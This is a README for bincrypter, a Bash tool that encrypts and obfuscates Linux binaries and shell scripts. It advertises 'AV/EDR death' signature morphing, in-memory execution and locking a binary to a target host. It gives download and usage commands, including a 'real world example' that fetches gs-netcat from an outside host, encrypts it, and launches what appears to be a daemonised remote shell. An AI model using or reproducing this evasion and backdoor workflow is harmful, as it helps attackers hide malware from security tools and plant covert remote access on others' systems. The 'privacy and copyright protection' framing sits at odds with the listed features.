File: README.md

package info (click to toggle)
bincrypter 1.3-1
  • links: PTS, VCS
  • area: main
  • in suites: sid
  • size: 144 kB
  • sloc: sh: 717; makefile: 6
file content (66 lines) | stat: -rw-r--r-- 1,771 bytes parent folder | download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# Privacy and copyright protection for your programs

## A Linux Binary Runtime Crypter - in BASH!

- Obfuscate & encrypt any ELF binary
- Obfuscate & encrypt any SHELL-script
- AV/EDR death: Morphing + different signature every time
- 100% in-memory. No temporary files
- Not soiling the filesystem
- Double or triple encrypt the same binary (or itself)
- Resulting binary is heavily obfuscated (`string` only shows garbage)
- Living off the Land (LotL): Only needs `/bin/sh` + `perl` + `openssl`
- Architecture agnostic: Works on x86_64, aarch64, arm6, mips, ...
- *Lock* a binary to a target system and make it fail to run anywhere else.

![exmaple](https://github.com/user-attachments/assets/c8eff8e4-f879-4017-9015-6422e03dd6ac)

Download:
```shell
curl -SsfL https://github.com/hackerschoice/bincrypter/releases/latest/download/bincrypter -o bincrypter
chmod +x bincrypter
./bincrypter -h
```

Example:
```shell
cp /usr/bin/id id
./bincrypter id
# Compressed: 68552 --> 24176 [35%]

./id
# uid=0(root) gid=0(root) groups=0(root)
```

Set a custom PASSWORD (optionally):
```shell
cp /usr/bin/id id
./bincrypter id foobar
# Compressed: 68552 --> 23860 [34%]

./id
# Enter Password: foobar
# uid=0(root) gid=0(root) groups=0(root)
```

Real world example:
```shell
curl -SsfL "https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)" | PASSWORD="foobar" ./bincrypter  >gsnc
chmod +x gsnc
PASSWORD="foobar" GS_ARGS="-ilD -s ChangeMe" ./gsnc
```

---
Other great work:  
https://github.com/guitmz/ezuri  
https://github.com/upx/upx  
https://bitlackeys.org/#sherlocked  

---
Join the fun: https://thc.org/ops  
bsky: [@hackerschoice.bsky.social](https://bsky.app/profile/hackerschoice.bsky.social)  
Mastodon: [@thc@infosec.exchange](https://infosec.exchange/@thc)